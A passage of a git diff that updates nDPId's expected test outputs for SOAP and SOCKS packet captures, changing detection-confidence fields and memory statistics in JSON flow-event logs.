wAmAGEAbQBwADsAMAAwADAAMgA8AC8AaAB3AGkAZAA+ADwALwBoAHcAaQBkAHMAPgA8AC8AZwBkAG0AZABoAHcAaQBkAD4APAAvAEgAVwBJAEQAUgBlAHEAdQBlAHMAdABzAD4APAAvAEQAZQB2AGkAYwBlAE0AZQB0AGEAZABhAHQAYQBCAGEAdABjAGgAUgBlAHEAdQBlAHMAdAA+ADwALwBzADoAQgBvAGQAeQA+ADwALwBzADoARQBuAHYAZQBsAG8AcABlAD4A"} -00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"soap.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":946731321416,"flow_last_seen":946731326059,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":2904,"flow_avg_l4_payload_len":580,"midstream":0,"thread_ts_msec":946731326059,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"23.2.213.165","src_port":50100,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"SOAP","breed":"Acceptable","category":"RPC"}} +00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"soap.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":946731321416,"flow_last_seen":946731326059,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":2904,"flow_avg_l4_payload_len":580,"midstream":0,"thread_ts_msec":946731326059,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"23.2.213.165","src_port":50100,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"SOAP","breed":"Acceptable","category":"RPC"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6,"source":"soap.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946731326059,"flow_last_seen":946731326059,"flow_idle_time":7580000,"flow_min_l4_payload_len":1452,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1452,"flow_avg_l4_payload_len":1452,"midstream":1,"thread_ts_msec":946731326059,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"23.2.213.165","src_port":50100,"dst_port":4176,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 02389{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"soap.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":946731326059,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":946731326059,"pkt":"eJS0JASgYDjgxTWgCABFAAXUJtNAAH8GH53AqAJkFwLVpcO0EFABqrpp6c\/N2FAQAQTI+AAAUE9TVCAvZndsaW5rLz9MaW5rSUQ9MjUyNjY5JmNsY2lkPTB4NDA5IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpDb250ZW50LVR5cGU6IHRleHQveG1sOyBjaGFyc2V0PSJVVEYtMTZMRSINClVzZXItQWdlbnQ6IE1JQ1JPU09GVF9ERVZJQ0VfTUVUQURBVEFfUkVUUklFVkFMX0NMSUVOVA0KU09BUEFjdGlvbjogImh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd2luZG93c21ldGFkYXRhL3NlcnZpY2VzLzIwMDcvMDkvMTgvZG1zL0RldmljZU1ldGFkYXRhU2VydmljZS9HZXREZXZpY2VNZXRhZGF0YSINCkNvbnRlbnQtTGVuZ3RoOiAzNjEyDQpIb3N0OiBnby5taWNyb3NvZnQuY29tDQoNCv\/+PAA\/AHgAbQBsACAAdgBlAHIAcwBpAG8AbgA9ACIAMQAuADAAIgAgAGUAbgBjAG8AZABpAG4AZwA9ACIAVQBUAEYALQAxADYAIgA\/AD4APABzADoARQBuAHYAZQBsAG8AcABlACAAeABtAGwAbgBzADoAcwA9ACIAaAB0AHQAcAA6AC8ALwBzAGMAaABlAG0AYQBzAC4AeABtAGwAcwBvAGEAcAAuAG8AcgBnAC8AcwBvAGEAcAAvAGUAbgB2AGUAbABvAHAAZQAvACIAPgA8AHMAOgBIAGUAYQBkAGUAcgA+ADwAaAA6AGMAZAAgAHgAbQBsAG4AcwA6AGgAPQAiAGgAdAB0AHAAOgAvAC8AcwBjAGgAZQBtAGEAcwAuAG0AaQBjAHIAbwBzAG8AZgB0AC4AYwBvAG0ALwB3AGkAbgBkAG8AdwBzAG0AZQB0AGEAZABhAHQAYQAvAHMAZQByAHYAaQBjAGUAcwAvADIAMAAwADcALwAwADkALwAxADgALwBkAG0AcwAiAD4APABoADoAYwB2AD4AMQAwAC4AMAAuADEAOQAwADQAMwA8AC8AaAA6AGMAdgA+ADwAaAA6AGMAYwA+AEQARQBVADwALwBoADoAYwBjAD4APAAvAGgAOgBjAGQAPgA8AC8AcwA6AEgAZQBhAGQAZQByAD4APABzADoAQgBvAGQAeQA+ADwARABlAHYAaQBjAGUATQBlAHQAYQBkAGEAdABhAEIAYQB0AGMAaABSAGUAcQB1AGUAcwB0ACAAeABtAGwAbgBzAD0AIgBoAHQAdABwADoALwAvAHMAYwBoAGUAbQBhAHMALgBtAGkAYwByAG8AcwBvAGYAdAAuAGMAbwBtAC8AdwBpAG4AZABvAHcAcwBtAGUAdABhAGQAYQB0AGEALwBzAGUAcgB2AGkAYwBlAHMALwAyADAAMAA3AC8AMAA5AC8AMQA4AC8AZABtAHMAIgA+ADwATABvAGMATABpAHMAdAA+ADwAbABvAGMAPgBNAHUAbAB0AGkATABvAGMAPAAvAGwAbwBjAD4APABsAG8AYwA+AGQAZQAtAEQARQA8AC8AbABvAGMAPgA8AGwAbwBjAD4AZABlADwALwBsAG8AYwA+ADwALwBMAG8AYwBMAGkAcwB0AD4APABNAEkARABSAGUAcQB1AGUAcwB0AHMAPgA8AGcAZABtAGQAbQBpAGQAPgA8AHIAaQBkAD4ANwA8AC8AcgBpAGQAPgA8AG0AaQBkAD4AQQBGAEYANABCAEQAMgAxAC0ARgBGADIANgAtADUAMQBGADYALQA4ADMANgA1AC0AMQA3ADgAOAA1AEYAMwA4ADYAQwA3AEQAPAAvAG0AaQBkAD4APAAvAGcAZABtAGQAbQBpAGQAPgA8AC8ATQBJAEQAUgBlAHEAdQBlAHMAdABzAD4APABIAFcASQBEAFIAZQBxAHUAZQBzAHQA"} -00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"soap.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946731326059,"flow_last_seen":946731326059,"flow_idle_time":7580000,"flow_min_l4_payload_len":1452,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1452,"flow_avg_l4_payload_len":1452,"midstream":1,"thread_ts_msec":946731326059,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"23.2.213.165","src_port":50100,"dst_port":4176,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"SOAP.Microsoft","breed":"Safe","category":"Cloud"}} +00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"soap.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946731326059,"flow_last_seen":946731326059,"flow_idle_time":7580000,"flow_min_l4_payload_len":1452,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1452,"flow_avg_l4_payload_len":1452,"midstream":1,"thread_ts_msec":946731326059,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"23.2.213.165","src_port":50100,"dst_port":4176,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"SOAP.Microsoft","breed":"Safe","category":"Cloud"}} 00551{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":16,"source":"soap.pcap","alias":"nDPId-test","packets-captured":16,"packets-processed":15,"total-skipped-flows":0,"total-l4-payload-len":6104,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":2,"total-active-flows":2,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":11,"global_ts_msec":1639054092487} 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":16,"source":"soap.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639054092487,"flow_last_seen":1639054092487,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1639054092487,"l3_proto":"ip4","src_ip":"185.32.192.30","dst_ip":"85.154.114.113","src_port":80,"dst_port":56028,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"soap.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1639054092487,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":70,"pkt_l4_len":32,"thread_ts_msec":1639054092487,"pkt":"AAAAAAAAAAgAAAAIgQADKAgARQAANKG0QADxBqbEuSDAHlWacnEAUNrcPMefU5W6cMWAEjhAOLcAAAIEBbQBAwMABAIAAA=="} 02098{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"soap.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1639054092538,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1285,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":1285,"pkt_l4_len":1247,"thread_ts_msec":1639054092538,"pkt":"AAAAAAAAAAgAAAAIgQADKAgARQAE88IlQAB\/BvOUVZpycbkgwB7a3ABQlbpwxTzHn1RQGAIF1wgAADw\/eG1sIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9IlVURi04Ij8+DQo8Wk1lc3NhZ2UgdGFyZ2V0PSJaQkJQLjEuUmVzb2x2ZUtJRCIgbWlub3I9IjM1IiBwYXJhbWhlYWRlcmxlbmd0aD0iMTE0IiBzaWduYXR1cmU9IkxXa1YzenFpNWFtVUUxUlVvTmtRT3cwdVhZNHczc0dXQncyMkdxYnRqZkFyS0VjanVjS2Z6ZUcydkNybjluZUIzNXlzc2xFZytJcUlDZkRHdk9qRkxJcDlBcHB2ZXJZNTBNS09WZHM4L1BGU2dwRG5oNE91UTg3Q3pKRXZUUkJZMldGakpOaS85NmY1ZktmSklqczQ5bElzcFpyZVRGWVNxYWZ4VDRPNCszbnd2MFpQYUtJNzI4akE3RWNUTUxwelZtc0RJaTBJU2srR21nOW85d3V0UXg2NEprdjdGdlFkQU1nYlVnWDhVaU1MTnRHQWVqSHBLTG1rdWo3TSsxSTNib0IraVg3MTAxaytIZGpaVmQrSjhaS0VNSkJnYTBJNjRLdmZPK2tNb1UzRVNSSm5wbWdVVmZVblVZckl4dDFHZFFMckhsa2hhZVZicUdaMzB2V2E4Zz09IiBzaWduZXI9InlNMmYzbGMzSjZSbTR3ODlmRGhlYm5RMXNxY3NBV2N0eFJiM3BDSFloTktUTnZiazlNM1pLRk9xYjIveE5hN3NaR1I4bm10c0U4T2lnaStLR2xrbndSNWx0SW9CODc1Tk8rRitWTCszYVdySlN2Zm5MQ2dCSlRMV1BwKyt1SUlqZUlCanYrTXB1S0xRM2NTMDMwQlRnUEk1dWlrS0l6Q1A0eEZucUFVampoWE9RVTR3WDMrRG1PczdEbm5QczhhZTk2UkNzWmVmZ0xpMzAyL281ZDVMRDJ1SnBEMUlmSnQ1Y1U1Y3V5UW5jYTRhd2M4bGhTcmFQbDlNNEpja29sQWt5cVlCNzg0UitKVVhYTExpKytjbHEzR1l4U2NJNjRyZHRKZWNWVENZRVcvUTJGU2VXV1c2UE9RdlBRNGZ3aFVPZEM0L05MSVJKdU9lTVAyVG9Ed3NNUT09IiBrZXk9ImduR1dLWGJFVzQwbHZHV1FxbkVKZWdtcXJCSXdBRVZtUmQwRzlJaDMzVCsycnBtRTY5WUQybHhNNHpzNy9weDVFOFRaSjdvYnV5ZVNpNTIvazZMeGp2ZWtkNTdVeTR5QSttaEZ5c1o5UGFXdHVobzRac2oyQ0NaenBjcXhRSW5pL1E4UDY4QkJSeWhKd0hVZHNmMjUxS3RLdmwzdWZFN0VpK254Rnk2bUlVZUptckpjT3U5L1dsNndUTkwxRUVrQmJzL0NIT2pQSlFpUi84UlFOdVN4aDRWYVRnNlFKM0VhVUFhYzFkV2REQmx5dmpUYzZHTnczbFUrdUtDQitpR05xeFNwSlIxMHlQS3VRR1h4S1N3ZTVOVGNuQnFmQncwZC9FMVZ6dWdmVEtqUXFDbmt4TjVEUnlWWEJwTkFyVnNjek4xMlZwdkJpdENUa25ObEhWOHMzdz09IiBpbml0dmVjdG9yPSJkWWhYYVRRWmVUaGZsTUc2VGJCdzN3PT0iPg0KPC9aTWVzc2FnZT4NCg=="} 00611{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"soap.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1639054092687,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":172,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":172,"pkt_l4_len":134,"thread_ts_msec":1639054092687,"pkt":"AAAAAAAAAAgAAAAIgQADKAgARQAAmsImQAB\/BvfsVZpycbkgwB7a3ABQlbp1kDzHn1RQGAIFKTIAABWnhAex4GkI+Emzf4RIldOZwd02PnXrmBnBHRrx+ET677ALMou1pxMGL4bsefKLEZJCsMhBQeRMREPGyDS\/Ls5rva5OrXg9O7PulAGNv3b+vbLJAQh1CgtCNjRdd437DmknBotv3IGznWL+EIv99mMNCg=="} -00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"soap.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1639054092487,"flow_last_seen":1639054092826,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1227,"flow_tot_l4_payload_len":3642,"flow_avg_l4_payload_len":728,"midstream":0,"thread_ts_msec":1639054092826,"l3_proto":"ip4","src_ip":"185.32.192.30","dst_ip":"85.154.114.113","src_port":80,"dst_port":56028,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"SOAP","breed":"Acceptable","category":"RPC"}} -00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"soap.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1639054092487,"flow_last_seen":1639054092826,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1227,"flow_tot_l4_payload_len":3642,"flow_avg_l4_payload_len":728,"midstream":0,"thread_ts_msec":1639054092826,"l3_proto":"ip4","src_ip":"185.32.192.30","dst_ip":"85.154.114.113","src_port":80,"dst_port":56028,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SOAP","breed":"Acceptable","category":"RPC"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"soap.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946731326059,"flow_last_seen":946731326059,"flow_idle_time":7580000,"flow_min_l4_payload_len":1452,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1452,"flow_avg_l4_payload_len":1452,"midstream":1,"thread_ts_msec":1639054092826,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"23.2.213.165","src_port":50100,"dst_port":4176,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SOAP.Microsoft","breed":"Safe","category":"Cloud"}} -00672{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":20,"source":"soap.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":946731321416,"flow_last_seen":946731326431,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":4652,"flow_avg_l4_payload_len":332,"midstream":0,"thread_ts_msec":1639054092826,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"23.2.213.165","src_port":50100,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SOAP","breed":"Acceptable","category":"RPC"}} +00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"soap.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1639054092487,"flow_last_seen":1639054092826,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1227,"flow_tot_l4_payload_len":3642,"flow_avg_l4_payload_len":728,"midstream":0,"thread_ts_msec":1639054092826,"l3_proto":"ip4","src_ip":"185.32.192.30","dst_ip":"85.154.114.113","src_port":80,"dst_port":56028,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"SOAP","breed":"Acceptable","category":"RPC"}} +00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"soap.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1639054092487,"flow_last_seen":1639054092826,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1227,"flow_tot_l4_payload_len":3642,"flow_avg_l4_payload_len":728,"midstream":0,"thread_ts_msec":1639054092826,"l3_proto":"ip4","src_ip":"185.32.192.30","dst_ip":"85.154.114.113","src_port":80,"dst_port":56028,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SOAP","breed":"Acceptable","category":"RPC"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"soap.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946731326059,"flow_last_seen":946731326059,"flow_idle_time":7580000,"flow_min_l4_payload_len":1452,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1452,"flow_avg_l4_payload_len":1452,"midstream":1,"thread_ts_msec":1639054092826,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"23.2.213.165","src_port":50100,"dst_port":4176,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SOAP.Microsoft","breed":"Safe","category":"Cloud"}} +00672{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":20,"source":"soap.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":946731321416,"flow_last_seen":946731326431,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":4652,"flow_avg_l4_payload_len":332,"midstream":0,"thread_ts_msec":1639054092826,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"23.2.213.165","src_port":50100,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SOAP","breed":"Acceptable","category":"RPC"}} 00553{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":20,"source":"soap.pcap","alias":"nDPId-test","packets-captured":20,"packets-processed":20,"total-skipped-flows":0,"total-l4-payload-len":9746,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":3,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":3,"total-idle-flows":3,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":20,"global_ts_msec":1639054092826} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 20/20 @@ -26,9 +26,9 @@ ~~ total active/idle flows...: 3/3 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5882554 bytes -~~ total memory freed........: 5882554 bytes -~~ total allocations/frees...: 118149/118149 +~~ total memory allocated....: 6009976 bytes +~~ total memory freed........: 6009976 bytes +~~ total allocations/frees...: 120909/120909 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 460 chars ~~ json string max len.......: 2394 chars diff --git a/test/results/socks-http-example.pcap.out b/test/results/socks-http-example.pcap.out index 9188607d3..8ca1c8266 100644 --- a/test/results/socks-http-example.pcap.out +++ b/test/results/socks-http-example.pcap.out @@ -4,18 +4,18 @@ 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"socks-http-example.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1386004309468,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1386004309468,"pkt":"ABNyxPHhAB9b\/1HLCABFAABAxApAAEAGJ5MKtJy5CrSc+dEdBDiu6S7xAAAAALAC\/\/9AOQAAAgQFtAEDAwQBAQgKFh7eWwAAAAAEAgAA"} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"socks-http-example.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1386004309469,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1386004309469,"pkt":"AB9b\/1HLABNyxPHhCABFAAA8AABAAEAG66EKtJz5CrScuQQ40R2gPF01ruku8qASOJDLlAAAAgQFtAQCCApiX+0zFh7eWwEDAwc="} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"socks-http-example.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1386004309469,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1386004309469,"pkt":"ABNyxPHhAB9b\/1HLCABFAAA0BhZAAEAG5ZMKtJy5CrSc+dEdBDiu6S7yoDxdNoAQICsSxgAAAQEIChYe3ltiX+0z"} -00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"socks-http-example.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1386004309468,"flow_last_seen":1386004309473,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":9,"flow_tot_l4_payload_len":17,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1386004309473,"l3_proto":"ip4","src_ip":"10.180.156.185","dst_ip":"10.180.156.249","src_port":53533,"dst_port":1080,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"SOCKS","breed":"Acceptable","category":"Web"}} +00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"socks-http-example.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1386004309468,"flow_last_seen":1386004309473,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":9,"flow_tot_l4_payload_len":17,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1386004309473,"l3_proto":"ip4","src_ip":"10.180.156.185","dst_ip":"10.180.156.249","src_port":53533,"dst_port":1080,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"SOCKS","breed":"Acceptable","category":"Web"}} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":15,"source":"socks-http-example.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1386004312331,"flow_last_seen":1386004312331,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1386004312331,"l3_proto":"ip4","src_ip":"10.180.156.185","dst_ip":"10.180.156.249","src_port":53534,"dst_port":1080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"socks-http-example.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1386004312331,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1386004312331,"pkt":"ABNyxPHhAB9b\/1HLCABFAABAPjdAAEAGrWYKtJy5CrSc+dEeBDi5gOhGAAAAALAC\/\/9xLQAAAgQFtAEDAwQBAQgKFh7peQAAAAAEAgAA"} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"socks-http-example.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1386004312331,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1386004312331,"pkt":"AB9b\/1HLABNyxPHhCABFAAA8AABAAEAG66EKtJz5CrScuQQ40R7KitgsuYDoR6ASOJBMFQAAAgQFtAQCCApiX\/hhFh7peQEDAwc="} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"socks-http-example.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1386004312331,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1386004312331,"pkt":"ABNyxPHhAB9b\/1HLCABFAAA0IDxAAEAGy20KtJy5CrSc+dEeBDi5gOhHyorYLYAQICuTRgAAAQEIChYe6XliX\/hh"} -00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"socks-http-example.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1386004312331,"flow_last_seen":1386004312379,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":5,"midstream":0,"thread_ts_msec":1386004312379,"l3_proto":"ip4","src_ip":"10.180.156.185","dst_ip":"10.180.156.249","src_port":53534,"dst_port":1080,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"SOCKS","breed":"Acceptable","category":"Web"}} +00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"socks-http-example.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1386004312331,"flow_last_seen":1386004312379,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":5,"midstream":0,"thread_ts_msec":1386004312379,"l3_proto":"ip4","src_ip":"10.180.156.185","dst_ip":"10.180.156.249","src_port":53534,"dst_port":1080,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"SOCKS","breed":"Acceptable","category":"Web"}} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":30,"source":"socks-http-example.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1386004317979,"flow_last_seen":1386004317979,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1386004317979,"l3_proto":"ip4","src_ip":"10.180.156.185","dst_ip":"10.180.156.249","src_port":53535,"dst_port":1080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 